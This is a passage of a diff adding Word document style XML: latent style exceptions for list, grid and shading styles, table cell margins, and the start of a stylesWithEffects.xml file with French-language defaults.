+    <w:lsdException w:name="Medium List 1" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium List 2" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 1" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 2" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 3" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Dark List" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Shading" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful List" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Grid" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light Shading Accent 1" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light List Accent 1" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light Grid Accent 1" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 1 Accent 1" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 2 Accent 1" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium List 1 Accent 1" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Revision" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="List Paragraph" w:semiHidden="0" w:uiPriority="34" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="Quote" w:semiHidden="0" w:uiPriority="29" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="Intense Quote" w:semiHidden="0" w:uiPriority="30" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="Medium List 2 Accent 1" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 1 Accent 1" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 2 Accent 1" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 3 Accent 1" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Dark List Accent 1" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Shading Accent 1" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful List Accent 1" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Grid Accent 1" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light Shading Accent 2" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light List Accent 2" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light Grid Accent 2" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 1 Accent 2" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 2 Accent 2" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium List 1 Accent 2" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium List 2 Accent 2" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 1 Accent 2" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 2 Accent 2" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 3 Accent 2" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Dark List Accent 2" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Shading Accent 2" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful List Accent 2" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Grid Accent 2" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light Shading Accent 3" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light List Accent 3" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light Grid Accent 3" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 1 Accent 3" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 2 Accent 3" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium List 1 Accent 3" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium List 2 Accent 3" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 1 Accent 3" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 2 Accent 3" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 3 Accent 3" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Dark List Accent 3" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Shading Accent 3" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful List Accent 3" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Grid Accent 3" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light Shading Accent 4" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light List Accent 4" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light Grid Accent 4" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 1 Accent 4" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 2 Accent 4" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium List 1 Accent 4" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium List 2 Accent 4" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 1 Accent 4" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 2 Accent 4" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 3 Accent 4" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Dark List Accent 4" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Shading Accent 4" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful List Accent 4" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Grid Accent 4" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light Shading Accent 5" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light List Accent 5" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light Grid Accent 5" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 1 Accent 5" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 2 Accent 5" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium List 1 Accent 5" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium List 2 Accent 5" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 1 Accent 5" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 2 Accent 5" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 3 Accent 5" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Dark List Accent 5" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Shading Accent 5" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful List Accent 5" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Grid Accent 5" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light Shading Accent 6" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light List Accent 6" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light Grid Accent 6" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 1 Accent 6" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 2 Accent 6" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium List 1 Accent 6" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium List 2 Accent 6" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 1 Accent 6" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 2 Accent 6" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 3 Accent 6" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Dark List Accent 6" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Shading Accent 6" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful List Accent 6" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Grid Accent 6" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Subtle Emphasis" w:semiHidden="0" w:uiPriority="19" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="Intense Emphasis" w:semiHidden="0" w:uiPriority="21" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="Subtle Reference" w:semiHidden="0" w:uiPriority="31" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="Intense Reference" w:semiHidden="0" w:uiPriority="32" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="Book Title" w:semiHidden="0" w:uiPriority="33" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="Bibliography" w:uiPriority="37"/>
+    <w:lsdException w:name="TOC Heading" w:uiPriority="39" w:qFormat="1"/>
   </w:latentStyles>
   <w:style w:type="paragraph" w:default="1" w:styleId="Normal">
     <w:name w:val="Normal"/>
@@ -1170,6 +1098,7 @@
       <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
     </w:pPr>
     <w:tblPr>
+      <w:tblInd w:w="0" w:type="dxa"/>
       <w:tblBorders>
         <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
         <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
@@ -1178,6 +1107,240 @@
         <w:insideH w:val="single" w:sz="4" w:space="0" w:color="auto"/>
         <w:insideV w:val="single" w:sz="4" w:space="0" w:color="auto"/>
       </w:tblBorders>
+      <w:tblCellMar>
+        <w:top w:w="0" w:type="dxa"/>
+        <w:left w:w="108" w:type="dxa"/>
+        <w:bottom w:w="0" w:type="dxa"/>
+        <w:right w:w="108" w:type="dxa"/>
+      </w:tblCellMar>
+    </w:tblPr>
+  </w:style>
+</w:styles>
+</file>
+
+<file path=word/stylesWithEffects.xml><?xml version="1.0" encoding="utf-8"?>
+<w:styles xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 wp14">
+  <w:docDefaults>
+    <w:rPrDefault>
+      <w:rPr>
+        <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+        <w:sz w:val="22"/>
+        <w:szCs w:val="22"/>
+        <w:lang w:val="fr-FR" w:eastAsia="en-US" w:bidi="ar-SA"/>
+      </w:rPr>
+    </w:rPrDefault>
+    <w:pPrDefault>
+      <w:pPr>
+        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
+      </w:pPr>
+    </w:pPrDefault>
+  </w:docDefaults>
+  <w:latentStyles w:defLockedState="0" w:defUIPriority="99" w:defSemiHidden="1" w:defUnhideWhenUsed="1" w:defQFormat="0" w:count="267">
+    <w:lsdException w:name="Normal" w:semiHidden="0" w:uiPriority="0" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="heading 1" w:semiHidden="0" w:uiPriority="9" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="heading 2" w:uiPriority="9" w:qFormat="1"/>
+    <w:lsdException w:name="heading 3" w:uiPriority="9" w:qFormat="1"/>
+    <w:lsdException w:name="heading 4" w:uiPriority="9" w:qFormat="1"/>
+    <w:lsdException w:name="heading 5" w:uiPriority="9" w:qFormat="1"/>
+    <w:lsdException w:name="heading 6" w:uiPriority="9" w:qFormat="1"/>
+    <w:lsdException w:name="heading 7" w:uiPriority="9" w:qFormat="1"/>
+    <w:lsdException w:name="heading 8" w:uiPriority="9" w:qFormat="1"/>
+    <w:lsdException w:name="heading 9" w:uiPriority="9" w:qFormat="1"/>
+    <w:lsdException w:name="toc 1" w:uiPriority="39"/>
+    <w:lsdException w:name="toc 2" w:uiPriority="39"/>
+    <w:lsdException w:name="toc 3" w:uiPriority="39"/>
+    <w:lsdException w:name="toc 4" w:uiPriority="39"/>
+    <w:lsdException w:name="toc 5" w:uiPriority="39"/>
+    <w:lsdException w:name="toc 6" w:uiPriority="39"/>
+    <w:lsdException w:name="toc 7" w:uiPriority="39"/>
+    <w:lsdException w:name="toc 8" w:uiPriority="39"/>
+    <w:lsdException w:name="toc 9" w:uiPriority="39"/>
+    <w:lsdException w:name="caption" w:uiPriority="35" w:qFormat="1"/>
+    <w:lsdException w:name="Title" w:semiHidden="0" w:uiPriority="10" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="Default Paragraph Font" w:uiPriority="1"/>
+    <w:lsdException w:name="Subtitle" w:semiHidden="0" w:uiPriority="11" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="Strong" w:semiHidden="0" w:uiPriority="22" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="Emphasis" w:semiHidden="0" w:uiPriority="20" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="Table Grid" w:uiPriority="59"/>
+    <w:lsdException w:name="Placeholder Text" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="No Spacing" w:semiHidden="0" w:uiPriority="1" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="Light Shading" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light List" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light Grid" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 1" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 2" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium List 1" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium List 2" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 1" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 2" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 3" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Dark List" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Shading" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful List" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Grid" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light Shading Accent 1" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light List Accent 1" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light Grid Accent 1" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 1 Accent 1" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 2 Accent 1" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium List 1 Accent 1" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Revision" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="List Paragraph" w:semiHidden="0" w:uiPriority="34" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="Quote" w:semiHidden="0" w:uiPriority="29" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="Intense Quote" w:semiHidden="0" w:uiPriority="30" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="Medium List 2 Accent 1" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 1 Accent 1" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 2 Accent 1" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 3 Accent 1" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Dark List Accent 1" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Shading Accent 1" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful List Accent 1" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Grid Accent 1" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light Shading Accent 2" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light List Accent 2" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light Grid Accent 2" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 1 Accent 2" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 2 Accent 2" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium List 1 Accent 2" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium List 2 Accent 2" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 1 Accent 2" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 2 Accent 2" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 3 Accent 2" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Dark List Accent 2" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Shading Accent 2" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful List Accent 2" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Grid Accent 2" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light Shading Accent 3" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light List Accent 3" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light Grid Accent 3" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 1 Accent 3" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 2 Accent 3" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium List 1 Accent 3" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium List 2 Accent 3" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 1 Accent 3" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 2 Accent 3" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 3 Accent 3" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Dark List Accent 3" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Shading Accent 3" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful List Accent 3" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Grid Accent 3" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light Shading Accent 4" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light List Accent 4" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light Grid Accent 4" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 1 Accent 4" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 2 Accent 4" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium List 1 Accent 4" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium List 2 Accent 4" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 1 Accent 4" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 2 Accent 4" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 3 Accent 4" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Dark List Accent 4" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Shading Accent 4" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful List Accent 4" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Grid Accent 4" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light Shading Accent 5" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light List Accent 5" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light Grid Accent 5" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 1 Accent 5" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 2 Accent 5" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium List 1 Accent 5" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium List 2 Accent 5" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 1 Accent 5" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 2 Accent 5" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 3 Accent 5" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Dark List Accent 5" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Shading Accent 5" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful List Accent 5" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Grid Accent 5" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light Shading Accent 6" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light List Accent 6" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light Grid Accent 6" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 1 Accent 6" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 2 Accent 6" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium List 1 Accent 6" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium List 2 Accent 6" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 1 Accent 6" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
